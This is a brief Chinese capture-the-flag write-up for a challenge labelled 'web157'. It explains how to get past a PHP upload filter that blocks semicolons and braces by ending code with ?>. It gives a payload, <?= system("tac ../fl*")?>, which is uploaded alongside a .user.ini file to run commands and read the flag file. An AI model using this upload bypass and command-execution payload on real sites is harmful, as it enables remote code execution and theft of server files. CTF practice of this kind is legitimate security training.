web157 web157 在上面的基础上,还过滤了; {} 分号在一条语句的情况下,可以利用?>结尾结束代替进行绕过,{}过滤了,就不能传参数了,直接代码执行吧 <?= system("tac ../fl*")?> 配合上传.user.ini,访问即可
